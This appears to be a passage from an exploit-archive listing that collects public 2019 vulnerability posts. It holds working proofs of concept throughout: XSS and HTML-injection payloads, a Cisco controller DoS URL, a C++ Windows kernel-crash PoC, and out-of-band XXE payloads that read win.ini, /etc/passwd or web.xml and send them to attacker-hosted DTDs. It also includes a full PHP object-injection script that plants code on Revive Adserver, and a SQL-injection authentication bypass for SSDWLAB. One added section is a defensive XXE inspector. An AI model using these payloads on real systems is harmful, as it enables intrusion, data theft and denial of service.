Cookie: inventory=4eg101l42apiuvutr7vguma5ar; online_inovicing_system=vl8ml5or8sgdee9ep9lnhglk69
Upgrade-Insecure-Requests: 1

groupID=2&name=Admins&description=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E&visitorSignup=0&invoices_insert=1&invoices_view=3&invoices_edit=3&invoices_delete=3&clients_insert=1&clients_view=3&clients_edit=3&clients_delete=3&item_prices_insert=1&item_prices_view=3&item_prices_edit=3&item_prices_delete=3&invoice_items_insert=1&invoice_items_view=3&invoice_items_edit=3&invoice_items_delete=3&items_insert=1&items_view=3&items_edit=3&items_delete=3&saveChanges=1

Online Clinic Management System 2.2 HTML Injection


Online Clinic Management System version 2.2 suffers from a html injection vulnerability.


MD5 | b2e8b9ed2bb7a8503bcc774fe443d4a1

# Exploit Title: Online Clinic Management System 2.2 - HTML Injection
# Date: 2019-11-29
# Exploit Author: Cemal Cihad ÇİFTÇİ
# Vendor Homepage: https://bigprof.com
# Software Download Link : https://bigprof.com/appgini/applications/online-clinic-management-system
# Software : Online Clinic Management System
# Version : 2.2
# Vulnerability Type : HTML Injection
# Vulnerability : HTML Injection

# HTML Injection has been discovered in the Online Clinic Management System created by bigprof/AppGini,
# in the add disease symptom, patient and appointment sections.
# payload: <b><i>asd</i></b>

# HTTP POST request

POST /clinic/disease_symptoms_view.php HTTP/1.1
Host: 10.10.10.160
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------325041947016922
Content-Length: 1501
Origin: http://10.10.10.160
Connection: close
Referer: http://10.10.10.160/clinic/disease_symptoms_view.php
Cookie: inventory=4eg101l42apiuvutr7vguma5ar; online_inovicing_system=vl8ml5or8sgdee9ep9lnhglk69; online_clinic_management_system=e3fqbalmcu4o9d4tvuuakpn9e8
Upgrade-Insecure-Requests: 1

-----------------------------325041947016922
Content-Disposition: form-data; name="current_view"

DV
-----------------------------325041947016922
Content-Disposition: form-data; name="SortField"

-----------------------------325041947016922
Content-Disposition: form-data; name="SelectedID"

1
-----------------------------325041947016922
Content-Disposition: form-data; name="SelectedField"

-----------------------------325041947016922
Content-Disposition: form-data; name="SortDirection"

-----------------------------325041947016922
Content-Disposition: form-data; name="FirstRecord"

1
-----------------------------325041947016922
Content-Disposition: form-data; name="NoDV"

-----------------------------325041947016922
Content-Disposition: form-data; name="PrintDV"

-----------------------------325041947016922
Content-Disposition: form-data; name="DisplayRecords"

all
-----------------------------325041947016922
Content-Disposition: form-data; name="disease"

<b><i>asd</i></b>

-----------------------------325041947016922
Content-Disposition: form-data; name="symptoms"

<b><i>asd</i></b>

-----------------------------325041947016922
Content-Disposition: form-data; name="reference"

-----------------------------325041947016922
Content-Disposition: form-data; name="update_x"

1
-----------------------------325041947016922
Content-Disposition: form-data; name="SearchString"

-----------------------------325041947016922--

Cisco WLC 2504 8.9 Denial Of Service


Cisco WLC 2504 version 8.9 suffers from a denial of service vulnerability.


MD5 | 9215aa968b49d3b98e32f665f3d9a9ea

# Exploit Title: Cisco WLC 2504 8.9 - Denial of Service (PoC)
# Google Dork: N/A
# Date: 2019-11-25
# Exploit Author: SecuNinja
# Vendor Homepage: cisco.com
# Software Link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-wlc-dos
# Version: 8.4 to 8.9
# Tested on: not applicable, works independent of OS
# CVE : CVE-2019-15276

# Exploit PoC:

https://WLCIPorHostname/screens/dashboard.html#/RogueApDetail/00:00:00:00:00:00">'><img src="xxxxx">

# Requesting this URL causes the controller to reload, which results in a DoS condition.

Microsoft Windows BasicRender.sys WARPGPUCMDSYNC NULL Pointer


Microsoft Windows suffers from a NULL pointer dereference in the WARPGPUCMDSYNC function of the BasicRender.sys driver. An unprivileged user can trigger the vulnerability to crash the system and deny service to the rest of the users.


MD5 | 64e7b7be479ae3ec443e4544303c901c

A NULL pointer dereference exists in the WARPGPUCMDSYNC function of the
BasicRender.sys driver. An unprivileged user can trigger the vulnerability
to crash the system and deny service to the rest of the users.

*PoC:*

#include <Windows.h>
#include <d3dkmthk.h>
#include <cstdio>
#include <cstring>

#pragma comment(lib, "gdi32.lib")   // the D3DKMT* thunks are exported by gdi32.dll

int main()
{
    D3DKMT_CREATEDEVICE* device = new D3DKMT_CREATEDEVICE();

    // Second enumerated adapter: in the original PoC this is the Basic Render
    // Driver (WARP) that BasicRender.sys backs. Adjust the index if it differs.
    D3DKMT_ENUMADAPTERS enumAdapter = { 0 };
    D3DKMTEnumAdapters(&enumAdapter);
    device->hAdapter = enumAdapter.Adapters[1].hAdapter;
    printf("[*] EnumAdapter\n");

    D3DKMTCreateDevice(device);

    D3DKMT_CREATECONTEXTVIRTUAL* contextVirtual = new D3DKMT_CREATECONTEXTVIRTUAL();
    memset(contextVirtual, 0, sizeof(D3DKMT_CREATECONTEXTVIRTUAL));
    contextVirtual->hDevice = device->hDevice;

    char data[0x200] = { 0 };
    memset(data, 0xff, 0x200);
    contextVirtual->PrivateDriverDataSize = 0x200;
    contextVirtual->pPrivateDriverData = data;
    contextVirtual->ClientHint = D3DKMT_CLIENTHINT_DX10;
    contextVirtual->Flags.InitialData = 0x000001;
    contextVirtual->Flags.NullRendering = 0x0;

    // The posted listing omits this call, but hContext is consumed below, so
    // the virtual context has to exist before the command is submitted.
    D3DKMTCreateContextVirtual(contextVirtual);

    D3DKMT_SUBMITCOMMAND* submitCommand = new D3DKMT_SUBMITCOMMAND();

    for (int i = 0; i < 0x10; i++)
        submitCommand->WrittenPrimaries[i] = 0x0;

    submitCommand->PresentHistoryToken = 0x100;
    submitCommand->Commands = 0x004b39;
    submitCommand->CommandLength = 0x00000d;
    submitCommand->BroadcastContext[0] = contextVirtual->hContext;
    submitCommand->BroadcastContextCount = 0x1;
    submitCommand->Flags.PresentRedirected = 0x1;

    submitCommand->PrivateDriverDataSize = 0x130;

    char* PrivateData = new char[submitCommand->PrivateDriverDataSize];
    memset(PrivateData, 0x00, submitCommand->PrivateDriverDataSize);

    // Command record at +0x118, starting with the tag 'SYNC' (0x434e5953 read
    // as little-endian ASCII); the crash lands in WARPGPUCMDSYNC::WARPGPUCMDSYNC,
    // the constructor shown in the crash dump below.
    *(DWORD*)(PrivateData + 0x118) = 0x434e5953;
    *(DWORD*)(PrivateData + 0x11c) = 0x18;
    *(DWORD*)(PrivateData + 0x120) = 0x000110;
    *(DWORD*)(PrivateData + 0x124) = 0x000420;
    *(DWORD*)(PrivateData + 0x128) = 0x0;
    *(DWORD*)(PrivateData + 0x12c) = 0x000428;

    submitCommand->pPrivateDriverData = PrivateData;

    // Triggers the NULL pointer dereference in the kernel; the machine bugchecks.
    D3DKMTSubmitCommand(submitCommand);
    return 0;
}

*Crash dump*:

STACK_TEXT:
8afae92c 8fe82cb2 8afae958 fffffffd 0000048c BasicRender!WARPGPUCMDSYNC::WARPGPUCMDSYNC+0xc
8afae94c 8fe8267d bb26afe8 00000000 bb26afe0 BasicRender!WARPKMCONTEXT::SubmitVirtual+0x4a
8afae9a8 8fca6af5 91e05000 bb26afe0 93dfc000 BasicRender!WarpKMSubmitCommandVirtual+0x87
8afae9fc 8fc2a934 8afaea68 8afaeac0 92b19db6 dxgkrnl!ADAPTER_RENDER::DdiSubmitCommandVirtual+0x115
8afaea08 92b19db6 90114c30 8afaea68 b78da008 dxgkrnl!ADAPTER_RENDER_DdiSubmitCommandVirtual+0x10
8afaeac0 92b4ac94 93dfc000 cd6ee008 cc6d8860 dxgmms2!VidSchiSendToExecutionQueue+0x526
8afaeb90 92b764a9 00000000 945f5a80 00000000 dxgmms2!VidSchiSubmitRenderVirtualCommand+0x534
8afaebb8 81ee80bc 93dfc000 28e5f697 00000000 dxgmms2!VidSchiWorkerThread+0x1a1
8afaebf0 81fe952d 92b76308 93dfc000 00000000 nt!PspSystemThreadStartup+0x4a
8afaebfc 00000000 00000000 bbbbbbbb bbbbbbbb nt!KiThreadStartup+0x15

eax=8afae958 ebx=00000000 ecx=00000000 edx=00000000 esi=00000000 edi=bb26afd8
eip=8fe8386c esp=8afae920 ebp=8afae92c iopl=0         nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010246
BasicRender!WARPGPUCMDSYNC::WARPGPUCMDSYNC+0xc:
8fe8386c c7061060e88f    mov     dword ptr [esi],offset BasicRender!WARPGPUCMDSYNC::`vftable' (8fe86010) ds:0023:00000000=????????
Resetting default scope

--------------------------------------------------------------------------------

The vulnerability has only been tested in Windows 10 x86 1803.
CVSS Base Score: 5.5
Credit: Victor Portal


Microsoft Visual Basic 2010 Express XML Injection


Microsoft Visual Basic 2010 Express suffers from an XML external entity injection vulnerability.


MD5 | 29b47286367b0567dffc3d07c2f2393d

# Exploit Title: Microsoft Visual Basic 2010 Express - XML External Entity Injection
# Exploit Author: ZwX
# Exploit Date: 2019-12-03
# Version Software : 10.0.30319.1 RTMRel
# Vendor Homepage : https://www.microsoft.com/
# Software Link: https://dotnet.developpez.com/telecharger/detail/id/593/Visual-Studio-2010-Express
# Tested on OS: Windows 7


[+] Exploit : (PoC)
===================
1) python -m SimpleHTTPServer 8000
2) Create file (.xml)
3) Create file Payload.dtd
4) Open the software Microsoft Visual Basic 2010
5) Drag the file (.xml) in a VB project
6) External Entity Injection Successful


[+] XXE.xml :
==============
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

[+] Payload.dtd :
=================
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
%all;


[+] Result Exploitation :
=========================
C:\>python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /payload.dtd HTTP/1.1" 200 -
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
Files%5D%0D%0Acolumns=193;100;60;89;100;160; HTTP/1.1" 301 -
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
Files%5D%0D%0Acolumns=193;100;60;89;100;160;/ HTTP/1.1" 200 -



BMC Smart Reporting 7.3 20180418 XML Injection


BMC Smart Reporting version 7.3 20180418 suffers from an XML external entity injection vulnerability.


MD5 | f6fc537add03d89d9a8d6d49f9cdba3b

<!--
# Exploit Title: XXE in BMC Smart Reporting 7.3 20180418
# Date: 11-12-2019
# Exploit Author: David Herrero
# Vendor Homepage: https://www.bmc.com/
# Software Link:
https://docs.bmc.com/docs/itsm90/export-and-import-repository-509983929.html
# Version: BMC Smart Reporting 7.3 20180418
# Tested on: Linux
# CVE : CVE-2019-11216
# Category: vulnerability

1. Description

BMC Smart Reporting 7.3 20180418 allows authenticated XXE within the
import functionality.
One authenticated user with admin privileges can import a malicious XML
file and perform XXE
attacks to download local files from the server, or do DoS attacks with
XML expansion attacks.
XXE with direct response and XXE OOB are allowed.


2. Proof of Concept

Login with an admin account into BMC Remedy Smart reporting, in the left
menu select the option
"Import", in the "Import File Selection" page upload a malicious XML
file like this one:

XML File for XXE Code in response:

<?xml version="1.0" encoding="UTF-8"?><!-- SmartReporting export file
--><!-- Generated at 2019-01-18 10:14 UTC (+0000) -->
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>
<info>
<exportversion>4</exportversion>
<exportsubversion>43</exportsubversion>
<appversion>7.3</appversion>
<buildversion>20180418</buildversion>
<exportdate>2019-01-18 10:14 UTC (+0000)</exportdate>
</info>
<source>
<id>66717</id>
<sourceName>&xxe;</sourceName>
<sourceDescription>testburpDESC</sourceDescription>
<userName>test</userName>
<password>Fi8IDs5q9p4=</password>
<connectionTypeCode>GENERICUSER</connectionTypeCode>
<connectionMethodCode>SSRS</connectionMethodCode>
<connectionDriver>evil.com</connectionDriver>
<databaseURL>http://wvil.com/a.txt</databaseURL>
<databaseTypeCode>GENERICJDBC</databaseTypeCode>
<minConnections>1</minConnections>
<maxConnections>5</maxConnections>
<connectionRefreshTime>3</connectionRefreshTime>
<connectionTimeOut>180</connectionTimeOut>
<accessCode>UNSECURE</accessCode>
<platformTypeCode/>
<maxRowCount>0</maxRowCount>
<broadcastPermitted>true</broadcastPermitted>
<subscribePermitted>true</subscribePermitted>
<dataProfileEnabled>true</dataProfileEnabled>
<localTimezoneCode>AUSTRALIA/SYDNEY</localTimezoneCode>
<secondaryMinConnections>0</secondaryMinConnections>
<secondaryMaxConnections>0</secondaryMaxConnections>
<secondaryConnectionRefreshTime>0</secondaryConnectionRefreshTime>
<secondaryConnectionTimeOut>0</secondaryConnectionTimeOut>
<filterList/>
<sourceParameterList>
<sourceParameter>
<id>0</id>
<parameterTypeCode>TEXT</parameterTypeCode>
<parameterKey>SOURCECLASSNAME</parameterKey>
<parameterIndex>0</parameterIndex>

<parameterValue>com.hof.sources.SSRSSourcePlatformImplementation</parameterValue>
<documentId>0</documentId>
<userVisible>true</userVisible>
</sourceParameter>
</sourceParameterList>
</source>
</data>

After loading the file, the web application should show the file
"/etc/passwd" inside the HTML code.
When reading XML files, the exploit must use OOB XXE because the content
of the file must be included inside "CDATA" tags; the XML payload is as
follows:

XML File for XXE CDATA exfiltration:

<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY % start "<![CDATA[">
<!ENTITY % stuff SYSTEM "file:///path/to/webapps/root/WEB-INF/web.xml">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://attackerip/evil1.xml">
%dtd;
]>
[...]
<sourceName>&all;</sourceName>
[...]

Content of "evil1.xml" is:

<!ENTITY all "%start;%stuff;%end;">

The vulnerable server must be able to reach the file uploaded at
http://attackerip/evil1.xml.


3. Solution:

Remedy Smart Reporting version 9.1.03.001 requires upgrade to the latest
hot fix bundle of this version.
Remedy Smart Reporting version 9.1.04.002 requires upgrade to the latest
hot fix bundle of this version.
Remedy Smart Reporting version 18.05.05 requires upgrade to the latest
hot fix bundle of this version.
Remedy Smart Reporting version 19.02.01 requires upgrade to the latest
hot fix bundle of this version.

4. References
CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11216
Vendor advisory:
https://bmcsites.force.com/casemgmt/sc_KnowledgeArticle?sfdcid=kA21O000000dKWrSAM&type=Solution
Product info:
https://docs.bmc.com/docs/itsm90/export-and-import-repository-509983929.html

5. Dates
01/18/2019 - Discovered Vulnerability
04/12/2018 - CVE Reserved
04/17/2018 - Details sent to Vendor
05/07/2019 - Vendor confirms that product is vulnerable
11/12/2019 - Vendor published an advisory
11/12/2019 - Public disclosure

-->



Microsoft Windows Media Center XML Injection


Microsoft Windows Media Center suffers from an XML external entity injection vulnerability. This vulnerability was originally released back on December 4, 2016, yet remains unfixed.


MD5 | 08852a95d58030559d7cf597ca2a27de

[+] Credits: John Page (aka hyp3rlinx)    
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS-MEDIA-CENTER-MOTW-BYPASS-XXE-ANNIVERSARY-EDITION.txt
[+] ISR: Apparition Security


[Vendor]
www.microsoft.com


[Product]
Microsoft Windows Media Center

Windows Media Center is a discontinued digital video recorder and media player created by Microsoft.
Media Center was first introduced to Windows in 2002 on Windows XP Media Center.


[Vulnerability Type]
XML External Entity MotW Bypass (Anniversary Edition)


[CVE Reference]
N/A


[Security Issue]
This vulnerability was originally released by me back on December 4, 2016, yet remains unfixed.
Now, to make matters worse, I will let you know "mark-of-the-web" (MotW) does not matter here; it's just ignored.
Meaning, if the .MCL file is internet downloaded it gets the MotW, but files are still exfiltrated.

Therefore, I am releasing this "anniversary edition" XXE with important MotW information.

This is a fully working remote information disclosure vulnerability that still affects Windows 7.
Windows 7 is near end of life this January, yet it is still used by many organizations.
Furthermore, it seems that Windows 8.1 (Pro) can also run Windows Media Center but I have not tested it.

Host the "FindMeThatBiotch.dtd" DTD file in the web-root of the attacker server Port 80 etc...
Download the ".mcl" file using Microsoft Internet Explorer.

Check the MotW where you downloaded the .mcl file dir /r and note the Zone.Identifier:$DATA exists.
Open the file and BOOM! watch shitz leaving!... still vulnerable after all these years lol.

OS: Windows 7 (tested successfully) and possibly Windows 8.1 Pro


[Exploit/POC]
1) "M$-Wmc-Anniversary-Motw-Bypass.mcl"

# PoC
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE knobgobslob [
<!ENTITY % data666 SYSTEM "c:\Windows\system.ini">
<!ENTITY % junk SYSTEM "http://<TARGET-IP>/FindMeThatBiotch.dtd">
%junk;
%param666;
%FindMeThatBiotch;
]>


2) "FindMeThatBiotch.dtd"
<!ENTITY % param666 "<!ENTITY &#x25; FindMeThatBiotch SYSTEM 'http://<TARGET-IP>/%data666;'>">


3) Auto exploit PHP .mcl file downloader.

<?php
$url = 'http://<ATTACKER-IP>/M$-Wmc-Anniversary-Motw-Bypass.mcl';
header('Content-Type: application/octet-stream');
header("Content-Transfer-Encoding: Binary");
header("Content-disposition: attachment; filename=\"" . basename($url) . "\"");
readfile($url);
?>


4) python -m SimpleHTTPServer 80



[POC Video URL]
https://www.youtube.com/watch?v=zcrATpBNAZ0


[Network Access]
Remote



[Severity]
High


[Disclosure Timeline]
Vendor Notification: December 4, 2016
MSRC "wont fix"
Dec 2, 2019 : Re-Public "unfixed anniversary" Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
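The three XXE advisories above (Visual Basic 2010 Express, BMC Smart Reporting and Windows Media Center) all rely on the same DTD constructs: an external SYSTEM entity naming the file to read, and a parameter entity that pulls an attacker-hosted DTD to assemble the exfiltration URL. The following is an added example, not code from any of those advisories or vendors: a pre-parse inspector built on Python's standard-library expat module that records what a document's DTD declares and never fetches anything, so an import or upload handler can reject such files before a resolving parser sees them. The sample documents are constructed here, modelled on the advisories' payloads with placeholder hosts.

```python
"""Pre-parse XXE inspection with the standard-library expat parser."""
import xml.parsers.expat as expat

# Constructed samples modelled on the advisories' payloads (placeholder hosts).
VB_PROJECT_XML = rb"""<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
"""

BMC_IMPORT_XML = rb"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data><source><sourceName>&xxe;</sourceName></source></data>
"""

MCL_FILE = rb"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE knobgobslob [
<!ENTITY % data666 SYSTEM "c:\Windows\system.ini">
<!ENTITY % junk SYSTEM "http://ATTACKER-HOST/FindMeThatBiotch.dtd">
%junk;
%param666;
%FindMeThatBiotch;
]>
"""

BENIGN_XML = b'<?xml version="1.0"?><data><info><appversion>7.3</appversion></info></data>'


def inspect_xml(data):
    """Parse `data` once with expat, recording every DTD feature an XXE
    payload needs, without resolving or fetching any of it."""
    report = {
        "doctype": None,           # (name, external subset system id)
        "internal_entities": [],   # entities with inline replacement text
        "external_entities": [],   # (name, system id): the XXE primitive
        "parameter_entities": [],  # names declared with '%', used for OOB chains
        "external_refs": 0,        # how often the parser asked to open a URI
        "parse_error": None,       # set when the document is not well-formed
    }
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        report["doctype"] = (name, sysid)

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        if is_param:
            report["parameter_entities"].append(name)
        if sysid is not None:          # SYSTEM/PUBLIC identifier present
            report["external_entities"].append((name, sysid))
        else:
            report["internal_entities"].append(name)

    def on_external_ref(context, base, sysid, pubid):
        # expat is asking us to open `sysid`: record the attempt and report
        # it as handled (return 1) without creating a child parser, so
        # nothing is ever read from disk or the network
        report["external_refs"] += 1
        return 1

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    # also process %param; references, so a remote-DTD chain shows up as a ref
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        report["parse_error"] = str(exc)
    return report


def is_acceptable_upload(data):
    """Policy for import/upload handlers: reject any document carrying a
    DOCTYPE at all. None of the formats in the advisories need a DTD, and
    refusing DTDs removes both entity expansion and external fetches."""
    return inspect_xml(data)["doctype"] is None


if __name__ == "__main__":
    for label, doc in [("VB project", VB_PROJECT_XML), ("BMC import", BMC_IMPORT_XML),
                       ("WMC .mcl", MCL_FILE), ("benign", BENIGN_XML)]:
        r = inspect_xml(doc)
        print(f"{label}: accept={is_acceptable_upload(doc)} "
              f"external={r['external_entities']} refs={r['external_refs']} "
              f"error={r['parse_error']}")
```

The inspector is meant to sit in front of whatever parser the application really uses (a .NET or Java parser in the cases above), which should itself have DTD processing disabled; the report also gives an incident responder the declared system identifiers, which is usually the first thing wanted when such a file turns up in an upload directory.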


WordPress CSS Hero 4.0.3 Cross Site Scripting


WordPress CSS Hero plugin versions 4.0.3 and below suffer from a cross site scripting vulnerability.


MD5 | 67191f29a0b7bf239bf91ecbc08bb983

Team,


Document Title

===============

CVE-2019-19133

Reflected XSS in CSS Hero (<= v.4.0.3) WordPress plugin.



Product Description

===============

CSS Hero WordPress Plugin

A live WordPress Theme editor that works without modifying any of your
theme files. Very low performance footprint: only generates and adds a
single static CSS file to your site.

Homepage: https://www.csshero.org/



CSS Hero is vulnerable to a reflected XSS attack (authenticated).



PoC

===============

Steps:

1) Authenticate to the WordPress application with the CSS Hero plugin installed.

2) Navigate to the following vulnerable link:



hxxp://vulnerable.wordpress.com/?csshero_action=edit_page&rand=1015&foo%22%3E%3C/iframe%3E%3Cscript%3Ealert(%27Reflected%20XSS%20in%20CSS%20Hero%204.0.3%27)%3C/script%3E%3Ciframe%3Ebar

3) JavaScript executes within the context of the browser. The
arbitrary parameter and value are reflected into the returned HTML.



Responsible Disclosure Information

===============

Vendor Contacted: 11/17

Date Patched: 11/20

Patched Version: v.4.0.7

Public Disclosure: 12/2



Cary Hooper

@nopantrootdance



Revive Adserver 4.2 Remote Code Execution


Revive Adserver version 4.2 suffers from a code execution vulnerability.


MD5 | 798dbf2fc1184deffa0d4ee3b26e6156

# Exploit Title: Revive Adserver 4.2 - Remote Code Execution
# Google Dork: "inurl:www/delivery filetype:php"
# Exploit Author: crlf
# Vendor Homepage: https://www.revive-adserver.com/
# Software Link: https://www.revive-adserver.com/download/archive/
# Version: 4.1.x <= 4.2 RC1
# Tested on: *nix
# CVE : CVE-2019-5434
# Сontains syntax error for protection against skids


<?php
# Revive Adserver 4.1.x <= 4.2 RC1 PHP Object Injection to Remote Code Execution (CVE-2019-5434)
# coded by @crlf, with love for antichat.com
# special thanks to @Kaimi :)
# the script should be used only for educational purposes!

namespace{
(!isset($argv[2]) ? exit(message('php '.basename(__FILE__).' https://example.com/adserver-dir/ \'<?php phpinfo(); ?>\'')) : @list($x, $url, $code) = $argv);

$source = 'data:text/html;base64,'.base64_encode('#');
$destination = 'plugins/.htaccess';
#$destination = 'var/.htaccess';

if(!strpos(request($url, $source, $destination), 'methodResponse')) exit(message('failed, no valid response from '.$url));

$source = 'data:text/html;base64,'.base64_encode($code);
$destination = 'plugins/3rdPartyServers/ox3rdPartyServers/doubleclick.class.php';
#$destination = 'var/default.conf.php';

request($url, $source, $destination);
message('check '.$url.$destination);

function request($url, $source, $destination){

$what = serialize(
['what' =>
new Pdp\Uri\Url(
new League\Flysystem\File( $destination,
new League\Flysystem\File( 'x://'.$source,
new League\Flysystem\MountManager(
new League\Flysystem\Filesystem(
new League\Flysystem\Config,
new League\Flysystem\Adapter\Local('')
),
new League\Flysystem\Plugin\ForcedCopy
)
)
)
)
]
);

$what = str_replace(['\Uri\Url\00'],['\5CUri\5CUrl\00'], str_replace(['s:', сhr(0)],['S:', '\\00'], $what));

$xml = '<?xml version="1.0" encoding="ISO-8859-1"?>
<methodCall>
<methodName>openads.spc</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>remote_addr</name>
<value>8.8.8.8</value>
</member>
<member>
<name>cookies</name>
<value>
<array>
</array>
</value>
</member>
</struct>
</value>
</param>
<param><value><string>'.$what.'</string></value></param>
<param><value><string>0</string></value></param>
<param><value><string>dsad</string></value></param>
<param><value><boolean>1</boolean></value></param>
<param><value><boolean>0</boolean></value></param>
<param><value><boolean>1</boolean></value></param>
</params>
</methodCall>';

return file_get_contents($url.'adxmlrpc.php', false, stream_context_create(
['http' =>
['method' => 'POST',
'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0',
'header' =>'Content-type: application/x-www-form-urlencoded',
'content'=> $xml
]
])
);
}

function message($str){
print PHP_EOL.'### '.$str.' ###'.PHP_EOL.PHP_EOL;
}
}

namespace League\Flysystem\Plugin{
class ForcedCopy{}
}

namespace League\Flysystem{
class Config{
protected $settings = [];
public function __construct(){
$this->settings = ['disable_asserts' => true];
}
}
class Filesystem{
protected $adapter;
protected $config;
public function __construct($config,$adapter){
$this->config = $config;
$this->adapter = $adapter;
}
}
class MountManager{
protected $filesystems = [];
protected $plugins = [];
public function __construct($filesystem, $handler){
$this->filesystems = ['x' => $filesystem];
$this->plugins = ['__toString' => $handler];
}
}
class File{
protected $path;
protected $filesystem;
public function __construct($path, $obj){
$this->filesystem = $obj;
$this->path = $path;
}
}
}

namespace League\Flysystem\Adapter{
class Local{
protected $pathPrefix;
public function __construct($prefix){
$this->pathPrefix = $prefix;
}
}
}

namespace Pdp\Uri{
class Url{
private $host;
public function __construct($file){
$this->host = $file;
}
}
}

SSDWLAB 6.1 Authentication Bypass


SSDWLAB version 6.1 suffers from an authentication bypass vulnerability.


MD5 | 95b708ca58abb8d946476174d5727a96

# Exploit Title: SSDWLAB 6.1 - Authentication Bypass
# Date: 2019-10-01
# Exploit Author: Luis Buendía (exoticpayloads)
# Vendor Homepage: http://www.sbpsoftware.com/
# Version: 6.1
# Tested on: IIS 7.5
# CVE : Pending
# Description: By injection on the SOAP function in the EditUserPassword function, it is possible to create a "fake" user and authenticate with it.

Request to the EditUserPassword Function

POST /PATH-TO-WEB-SERVICE/WebService.asmx HTTP/1.1
Host: XXXXXXX.com
Content-Type: text/xml; charset=utf-8
Content-Length: 462
SOAPAction: "http://tempuri.org/EditUserPassword"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<EditUserPassword xmlns="http://tempuri.org/">
<coUser>' or 1=1 --</coUser>
<sOldPwd>string</sOldPwd>
<sNewPwd>string</sNewPwd>
<coLang>ENG</coLang>
</EditUserPassword>
</soap:Body>
</soap:Envelope>

Example of response when the injection is successful

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
X-AspNet-Version: 4.0.30319
X-Powered-By: XXX.XXX
Content-Length: 421

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><EditUserPasswordResponse xmlns="http://tempuri.org/"><EditUserPasswordResult><ListMsg /><ErrLevel>0</ErrLevel><MetaData /></EditUserPasswordResult></EditUserPasswordResponse></soap:Body></soap:Envelope>

Request to Login After Successful Request

POST /PATH-TO-WEB-SERVICE/WebService.asmx HTTP/1.1
Host: XXXXXXX.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: https://XXXXXXX.com/PATH-TO-WEB-SERVICE/main.swf/[[DYNAMIC]]/2
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Login"
